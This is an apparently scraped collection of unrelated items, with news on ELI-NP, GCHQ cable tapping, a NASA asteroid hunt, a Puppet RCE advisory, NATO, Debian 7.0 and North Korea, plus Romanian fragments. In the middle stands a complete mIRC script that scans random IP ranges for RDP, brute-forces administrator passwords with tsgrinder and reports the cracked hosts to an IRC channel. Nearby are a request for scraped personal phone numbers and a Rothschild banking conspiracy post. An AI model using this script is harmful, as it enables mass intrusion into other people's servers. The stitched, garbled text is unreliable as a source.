Romania's Government, Education Ministry and the Horia Hulubei National Institute of Nuclear Physics and Engineering (IFIN-HH) will hold on Friday at the Magurele research platform a ceremony for the start of construction works on the Extreme Light Infrastructure - Nuclear Physics (ELI-NP) research facility. Attending the event will be Romania's Prime Minister Victor Ponta; European Commissioner for Regional Policy Johannes Hahn; Romania's Education Ministry Remus Pricopie; Minister-delegate for Higher Education, Scientific Research and Development Mihnea Costoiu; state secretary with Education Ministry Tudor Prisecaru, and IFIN-HH Director General Nicolae Victor Zamfir. The Extreme Light Infrastructure - Nuclear Physics (ELI-NP) Scientific Facility, to be built on the Magurele-Bucharest Physics Platform, will become operational in 2017 and employ the largest number of Eastern European nuclear specialists. The main instruments of the centre will be a very high intensity laser, where beams from two 10 PW Apollon type lasers are coherently added to get intensities of the order of 1023 - 1024 W/cm2 and electrical fields of 1015 V/m, and a very intense (1013 y/s), brilliant beam, 0.1 % bandwidth, with Ev = 19 MeV, which is obtained by incoherent Compton back scattering of a laser light off a very brilliant, intense, classical electron beam (Ee = 600 MeV). The brilliant bunched electron beam will be produced by a warm linac using the X-band technology. ELI-NP will be one of the three pillars of ELI - THE EXTREME LIGHT INFRASTRUCTURE, along with the facilities dedicated to the study of secondary sources (Dolni Brezany, near Prague) and attosecond pulses (Szeged). ELI-NP is a very complex facility. The project costs are put at 356.231 million euros, 83 percent of which will be covered by the EU and 17 percent by Romania. The project will be developed in two stages: a stage that spans the current programming period of structural funds, when 180 million euros will be spent, to end in 2015, and a second stage, spanning the years 2014-2016. Via

Learn to code | Codecademy

Numere telefon Orange ( 0753 69 5X XX ) numere reale cu nume, prenume, cost? http://www.blackhatworld.com/blackhat-seo/black-hat-seo-tools/152017-web-scrapers-grab-phone-number.html

;RDP Range scanner made by independent (need tsgrinder by thor from HoG) ;Disclaimer: ;The responsiblity of how the program will be used lies in the hands of the person who installs it and will use it, that's you. ;I will not be held responsible for any of your actions. ;If you don't agree, do not install this file. ;By using the proxy scanner, you accept the responsibility of your action on your own. ;RDP Range scanner made by independent (need tsgrinder by thor from HoG) ;Disclaimer: ;The responsiblity of how the program will be used lies in the hands of the person who installs it and will use it, that's you. ;I will not be held responsible for any of your actions. ;If you don't agree, do not install this file. ;By using the proxy scanner, you accept the responsibility of your action on your own. on 1:LOAD:{ set %username administrator | set %delay 23 | rangerdp 76. $+ $r(0,255) $+ . $+ $r(0,255) | if (!$server) server %def.s %def.p -j $chr(35) $+ $gettok(%def.c,1,32) | if ($server) msg $chr(35) $+ $gettok(%def.c,1,32) $colourencode(* Successfully loaded RDP range scanner with $os .) } alias dothatfkincrap { if ($isfile(START.bat)) .remove start.bat write START.bat @ECHO OFF write START.bat SETLOCAL write START.bat SET LogOptions=ECHO DONT_ZIP write START.bat logtext $1 "" $chr(37) $+ LogOptions% write START.bat logtext $1 "***Cracking $1 User: %username ***" $chr(37) $+ LogOptions% write START.bat CALL tsgrinder.exe -u %username $1 $+ $chr(124) logtext $1 "" STDIN $chr(37) $+ LogOptions% write START.bat ENDLOCAL run START.BAT } alias rangerdp { unset %range* set %range1 $gettok($1,1,46) set %range2 $gettok($1,2,46) set %range3 $gettok($1,3,46) .timerRANGE -om 0 20 nextrdp 3389 .timerrange2 -o 0 300 tellpass if ($server) msg $chr(35) $+ $gettok(%def.c,1,32) $colourencode(* SCAN Starting at $1 .) } alias tellpass { :NEXT %max = $findfile($mircdir,*.*.*.*.log,0) inc %incmax if (%incmax > %max) || (%max == 0) goto end if (!$read($findfile($mircdir,*.*.*.*.log,%incmax),w,*su*,0)) .remove $findfile($mircdir,*.*.*.*.log,%incmax) if ($read($findfile($mircdir,*.*.*.*.log,%incmax),w,*su*,0)) inc %passs goto NEXT :END unset %max unset %incmax msg $chr(35) $+ $gettok(%def.c,1,32) Found %passs passwords. unset %passs } menu menubar { RDP scanner: window -e @rdp } menu @rdp { scan range: rangerdp $?="String1" $+ . $+ $?="String2" $+ . $+ $?="String3" Stop/Pause: stoprdp continue:{ .timerRANGE -om 0 20 nextrdp | echo @RDP 8* Resuming from last point... } - edit dictionary: run notepad dict - Open mstsc from cmdline: run mstsc -v $?="Ip Please..." - User %username : set %username $$?="Username please" Delay %delay : set %delay $$?="Delay between each brutes in seconds" } alias nextrdp { :START set %temp $r(0,999999999999) if ($sock(rdp $+ %temp).name != $null) goto START inc %range4 sockopen rdp $+ %temp %range1 $+ . $+ %range2 $+ . $+ %range3 $+ . $+ %range4 3389 goto next :NEXT if (%range4 >= 255) { inc %range3 | set %range4 0 } if (%range3 >= 255) { inc %range2 | set %range3 0 } if (%range2 >= 255) { unset %range* | .timerRANGE off | if ($server) msg $gettok(%def.c,1,32) * Scan halted. | halt } } alias stoprdp { .timerrange* off | .timerrestart off | sockclose *rdp* } on 1:INPUT:@rdp:sockopen RDP $+ $r(0,999999999999) $gettok($wildtok($1-,*.*.*.*,1,32),1,58) 3389 on 1:SOCKOPEN:RDP*:{ if (!$sockerr) { .timerRANGE off | .timerRESTART -o 1 %delay .timerRANGE -om 0 20 nextrdp 3389 | set %range3 $gettok($sock($sockname).ip,3,46) | set %range4 $gettok($sock($sockname).ip,4,46) | dothatfkincrap $sock($sockname).ip | if (!$read($findfile($mircdir,*.*.*.*.log,1),w,*su*,0)) .remove $findfile($mircdir,*.*.*.*.log,1) | sockclose *rdp* } } ;RDP End Download TSGrinder v2.03 The only Terminal Services (RDP) brute-force tool in the world. Originally written to illustrate critical weaknesses in the MSFT implementation of RDP for Windows 2003, futher development for 2008+ was eliminated as MFST implemented changes to RDP that addressed the issues I exposed. Source

Aerial image of the Government Communications Headquarters (GCHQ) in Cheltenham, Gloucestershire. Photo: Ministry of Defence/Wikipedia The British spy agency GCHQ has secretly tapped more than 200 fiber-optic cables carrying phone and internet traffic and has been sharing data with the U.S. National Security Agency, according to a news report. The spy operation, which included placing intercepts at the landing points of transatlantic undersea cables where they surface in the U.K., has allowed the Government Communications Headquarters (GCHQ) to become the top interceptor of phone and internet data in the world, according to the Guardian newspaper, which broke the story based on documents leaked by former NSA systems administrator Edward Snowden. One part of the operation, codenamed Tempora, has been operating for about 18 months and allows the agency to tap large volumes of data siphoned from the cables and store it for up to 30 days for sifting and analyzing. Each of the cables carries about 10 gigabits of data per second, which the paper likened to sending all of the information in all the books in the British Library through the cables 192 times every 24 hours. Filters allow the agency to reduce the amount of traffic it records — one filter cuts out about 30 percent of traffic just by eliminating peer-to-peer downloads — while still collecting vast amounts of data that get sifted by analysts. Some 850,000 NSA employees and U.S. private contractors with top secret clearance have access to GCHQ databases and as of May last year, at least 750 analysts from the U.K. and NSA were tasked specifically with sifting through the data, using more than 70,000 search terms related to security, terrorist activity and organized crime. Search terms focus on subjects, phone numbers and email addresses of interest. The tapping was conducted in cooperation with commercial companies that own and operate the cables, the paper noted. “There’s an overarching condition of the licensing of the companies that they have to co-operate in this,” an unnamed source told the paper. “Should they decline, we can compel them to do so. They have no choice.” The tapping began as a trial in 2008 and within two years the GCHQ achieved top eavesdropper status among the nations known as the Five Eyes of electronic eavesdropping — U.S., U.K., Canada, Australia and New Zealand. GCHQ reportedly now “produces larger amounts of metadata than NSA” as a result of the program. During a 2008 visit to the GCHQ’s listening station at Menwith Hill NSA Director Gen. Keith Alexander reportedly remarked: “Why can’t we collect all the signals all the time? Sounds like a good summer project for Menwith.” The program has been justified for allowing the agencies to identify new techniques used by terrorists to thwart security checks, to uncover terrorist activities during the planning stages and to track child exploitation networks and aid in cybersecurity defenses against network attacks. Via

The White House and NASA on Tuesday will ask the public for help finding asteroids that potentially could slam into the Earth with catastrophic consequences. Citing planetary defense, the administration has decided that the search for killer rocks in space should be the latest in a series of “Grand Challenges,” in which the government sets an ambitious goal, helps create public-private partnerships and sometimes offers prize money for innovative ideas. “This is really a call to action to find all asteroid threats to human populations and know what to do about them,” NASA Deputy Administrator Lori Garver said Monday. She said the asteroid hunt would help prove that “we’re smarter than the dinosaurs.” There is a second, overlapping agenda at work here: The NASA human spaceflight program needs to find a target rock for what is now being called the Asteroid Redirect Mission (formerly the Asteroid Retrieval Mission), or ARM. The proposed mission, which is early in the planning stages, would send astronauts to visit an asteroid that had been redirected into a high lunar orbit. But first a robotic spacecraft would have to rendezvous with the asteroid and capture it. And even before that, scientists would have to find the right asteroid. The target rock has to be moving at a leisurely pace relative to the Earth, and ideally would come close to the Earth-moon system sometime in the early 2020s. At present, NASA has a short list of possible targets, but all need further scrutiny to see if they have the size, shape, spin rate and composition that the asteroid mission would require. Two recent feasibility studies used as their reference a rock discovered in 2009, but NASA scientists aren’t sure that it will meet the mission requirements. For one thing, it might turn out to be too small. They plan to study it this fall with the Spitzer Space Telescope. But NASA scientists are clearly eager to speed up the rate of discovery of small asteroids, and thus expand the pool of candidate rocks for the ARM mission. The Earth coexists with a swarm of asteroids of varying sizes. Thanks to a number of asteroid searches in the past 15 years, some funded by NASA, about 95 percent of the near-Earth objects (NEOs) larger than 1 kilometer (about three-fifths of a mile) in diameter have already been detected, and their trajectories calculated. None poses a significant threat of striking the Earth in the foreseeable future. The science is clear: Cat*astrophic impacts, such as the one implicated in the extinction of the dinosaurs about 65 million years ago, are very rare, and no one needs to panic about killer rocks. But as one goes down the size scale, these objects become more numerous and harder to detect. Congress in 2005 charged NASA with finding all the asteroids greater than 140 meters (459 feet) in diameter. Asteroids that size are generally regarded as large enough to take out a city. According to NASA, there are also probably about 25,000 near-Earth asteroids that are 100 meters (328 feet) or larger. Only 25 percent of those have been detected, many through NASA’s Near Earth Object Program. The administration is asking Congress to double the budget for asteroid detection, to $40 million, Garver said. But the Grand Challenge would elicit help from academics, international partners and backyard astronomers. The search for NEOs took on greater urgency on Feb. 15, when, on the very day that a previously detected asteroid was about to make a close pass of the Earth, an unknown 50-foot-diameter rock came out of the glare of the sun and fireballed through the atmosphere above the Russian city of Chelyabinsk. The asteroid’s disintegration caused a shock wave that shattered windows and caused hundreds of injuries and major property damage. It was the first recorded instance of an asteroid causing human casualties. (In 1908 an asteroid exploded over Siberia and flattened trees in a vast, unpopulated area.) “Even though these smaller asteroids don’t pose a threat to human civilization, they can still cause major damages and casualties on a regional level,” said Tom Kalil, deputy director for technology and innovation at the White House Office of Science and Technology Policy. The administration’s Grand Challenges include efforts to understand the human brain and cure brain disorders, make solar energy cost-competitive by the decade’s end, and make electric cars as affordable as gasoline-powered vehicles. Sources: White House, NASA want help hunting asteroids - The Washington Post NASA needs help finding the asteroids we'll be visiting in 2025 | The Verge

Big trouble in automated clouds Puppet Labs has blasted out a security advisory about a vulnerability in the popular infrastructure management tool Puppet. The CVE-2013-3567 (Unauthenticated Remote Code Execution Vulnerability) warning was issued by Puppet Labs on Tuesday, and advises all Puppet users to upgrade to versions 2.7.22, 3.2.2 or later, and paid-for customers of Puppet Enterprise to move to 2.8.2. The vulnerability is serious as it allows for code to be executed remotely. "When making REST api calls, the puppet master takes YAML from an untrusted client, deserializes it, and then calls methods on the resulting object. A YAML payload can be crafted to cause the deserialization to construct an instance of any class available in the ruby process, which allows an attacker to execute code contained in the payload," the company wrote. Puppet is an open source configuration management and automation tool, and its development is stewarded by Puppet Labs, which makes the commercial version, Puppet Enterprise. VMware was the sole investor in the company's $30 million fourth funding round in January. One alternative to Puppet is Chef, which is made by Opscode. Chef has been backed heavily by Amazon Web Services and sits inside the company's OpsWorks control layer. ® Via

NATO has confirmed plans to create new elite cyber defence teams designed to deal with hyper-sophisticated threats. NATO secretary general Anders Fogh Rasmussen announced the plan at a keynote in Brussels on Wednesday, confirming that the alliance will form quick-reaction cyber defence teams to protect its networks, while also aiding allies being hit by cyber attacks. The teams' services are planned to be made available to all NATO member states by October. Rasmussen said the cyber teams' creation is an essential step that will help member states deal with an increased cyber threat, warning that no nation is currently equipped to deal with problem alone. "Cyber attacks do not stop at national borders. Our defenses should not, either," he said. "We are all closely connected. An attack on one ally, if not dealt with quickly and effectively, can affect us all. Cyber defense is only as effective as the weakest link in the chain. By working together, we strengthen the chain." Rasmussen cited the 2,500 significant attempts on NATO's networks over the last year as proof of the increased threat, but added that, despite the rise, the alliance is yet to suffer a serious security breach. NATO is one of many bodies to attempt to address the growing cyber threat facing Europe. The European Commission has similarly cited improving the region's defences as a key part of its Digital Agenda and Cyber Security Strategy. Within the UK the government has launched a slew of new initiatives to help train a new generation of security experts and increase information sharing between the public and private sector. Most recently these have included the creation of two new cyber security higher education centres at Oxford University and Royal Holloway University London and the formulation of the Cyber Security Information Sharing Partnership (CISP). Via

http://www.youtube.com/watch?v=d1IgiNnOZV4 12 Year Old Girl Tells The SHEEPLE the Truth about ROTHSCHILD CORRUPT BANKERS and ECONOMY When Ron Paul stands up in front of a crowd and explains the fictional-reserve banking system's unreality, some listen, many shrug and bury their heads. When ZeroHedge does the same, comments are heavy but change is slow to come. But when a 12-year-old girl, in a little over five minutes can explain the total farce that is our monetary system, surely people have to listen and break free of the matrix. Victoria Grant, 12, explains how "The banks and the government have colluded to financially enslave the people of Canada," and as CTV notes, 'Grant lays out a brief history of the Canadian banking system, referencing obscure historical figures such as former Vancouver mayor Gerald McGeer and explaining that the Bank of Canada held primary control over government lending until the 1970's. Starting then, she says, governments began borrowing from private banks instead at considerably higher interest rates than those available through the central bank. The result, Grant argues, is a rapidly increasing national debt. The pint-sized pundit is quick to offer a solution. "If the Canadian Government needs money, they can borrow it directly from the Bank of Canada," she says. " ... Canadians would again prosper with real money as the foundation of our economic structure." The truth is out there - whether it comes from Alan Simpson, Ron Paul, ZeroHedge, or a 12-year-old Canadian young lady. HOPE!!!: BRILLIANT 12 YEAR OLD GIRL EXPOSES THE FRAUDULENT ROTHSCHILD BANKING SYSTEM – Secrets of the Fed

After many months of constant development, the Debian project is proud to present its new stable version 7.0 (code name Wheezy). This new version of Debian includes various interesting features such as multiarch support, several specific tools to deploy private clouds, an improved installer, and a complete set of multimedia codecs and front-ends which remove the need for third-party repositories. Multiarch support, one of the main release goals for Wheezy, will allow Debian users to install packages from multiple architectures on the same machine. This means that you can now, for the first time, install both 32- and 64-bit software on the same machine and have all the relevant dependencies correctly resolved, automatically. The installation process has been greatly improved: Debian can now be installed using software speech, above all by visually impaired people who do not use a Braille device. Thanks to the combined efforts of a huge number of translators, the installation system is available in 73 languages, and more than a dozen of them are available for speech synthesis too. In addition, for the first time, Debian supports installation and booting using UEFI for new 64-bit PCs (amd64), although there is no support for Secure Boot yet. This release includes numerous updated software packages, such as: Apache 2.2.22 Asterisk 1.8.13.1 GIMP 2.8.2 an updated version of the GNOME desktop environment 3.4 GNU Compiler Collection 4.7.2 Icedove 10 (an unbranded version of Mozilla Thunderbird) Iceweasel 10 (an unbranded version of Mozilla Firefox) KDE Plasma Workspaces and KDE Applications 4.8.4 kFreeBSD kernel 8.3 and 9.0 LibreOffice 3.5.4 Linux 3.2 MySQL 5.5.30 Nagios 3.4.1 OpenJDK 6b27 and 7u3 Perl 5.14.2 PHP 5.4.4 PostgreSQL 9.1 Python 2.7.3 and 3.2.3 Samba 3.6.6 Tomcat 6.0.35 and 7.0.28 Xen Hypervisor 4.1.4 the Xfce 4.8 desktop environment X.Org 7.7 more than 36,000 other ready-to-use software packages, built from nearly 17,500 source packages. Debian -- News -- Debian 7.0 "Wheezy" released

North Korea is barely connected to the global internet. But it’s trying to step up its hacker game by breaking into hostile networks, according to a new Pentagon report. “North Korea probably has a military computer network operations (CNO) capability,” assesses the Pentagon’s latest public estimate (.PDF) of the military threat from North Korea. So far, suspected North Korean cyber efforts are more like vandalism and espionage than warfare — as with most so-called “cyberattacks” not related to the U.S./Israeli Stuxnet worm. But the Pentagon believes Pyongyang is going to lean into network attacks in the future, largely out of necessity. “Given North Korea’s bleak economic outlook, CNO may be seen as a cost-effective way to modernize some North Korean military capabilities,” the report assesses. “The North Korean regime may view CNO as an appealing platform from which to collect intelligence.” North Korea appears to be feeling its way around in the dark of the internet and seeing what it can get away with. Since 2009, the Pentagon says, the North Koreans are believed to have targeted the servers of a major South Korean bank to erase customer records and render its online services inaccessible. Pyongyang likely DDOS’d a bunch of South Korean government and private websites over the last several years. Just last month, while tensions on the Korean Peninsula spiked, Seoul accused Pyongyang of infecting tens of thousands of computers used by the South’s banking and television industries with malware. Back in April, he website of the U.S. military command on the Korean peninsula briefly went offline — and fueled suspicion that Pyongyang was to blame. Interestingly, the Pentagon stops short of blaming North Korea for the outage. All this is commensurate with what the Pentagon sees as a broader pattern in North Korea’s military development: developing its unconventional prowess — like nuclear weapons and experimental long-range missiles — to compensate for its aged, creaking conventional forces. North Korea has one of the largest arsenals on the planet. It’s got a military of 950,000 personnel, mostly ground forces; 8,500 field artillery pieces; 4,100 tanks; maybe 100 short-range missile launchers; and more, mostly pointed at Seoul. But a lot of that stuff is decrepit crap, according to the Pentagon report. Its most capable combat aircraft? Creaky MiG-29 and MiG-23 fighters. Its most recent aircraft acquisition? 1999, when it bought MiGs from — wait for it — Kazakhstan. The primary air tool to transport its (legitimately formidable) special-operations forces? “1940s vintage single engine, 10-passenger, bi-planes.” Its surface naval fleet? “Primarily of aging, though numerous, small patrol craft.” Most of Pyongyang’s conventional weapons haven’t been updated or upgraded since the 1970s. The Korean People’s Army “fields primarily legacy equipment, either produced in, or based on designs of, the Soviet Union and China, dating back to the 1950s, 60s and 70s, though a few systems are based on more modern technology,” the report finds. There are some major exceptions. Pyongyang’s air-defense systems are upgraded relatives of Russia’s intimidating S-300 system. It’s going full speed ahead with efforts at an intercontinental ballistic missile. Its submarine fleet is one of the world’s largest. Kim Jong-un is down with Dennis Rodman. Significantly, the report does not back up a recent Defense Intelligence Agency assessment that North Korea might — might — be able to mount a nuclear warhead atop its missiles. The report says the North’s working on it, not that it’s shrunk a nuke down to sufficiently small size. But even with the North’s longstanding its “Military First” national strategy, its paltry economy doesn’t provide Pyongyang with enough money to upgrade and modernize. Hence the emphasis on nukes — and network intrusions. “North Korea has invested in a modern nationwide cellular network,” the report notes. “Telecommunication services and access are strictly controlled, and all networks are available for military use, if necessary.” Via: Pentagon Warns North Korea Could Become a Hacker Haven | Danger Room | Wired.com

trebuie puse ns1.hostgate.ro ns2.hostgate.ro ns3.hostgate.ro iar tu ai ns1.hostgate.ro ns2.hostgate.ro ns1.mdnsservice.com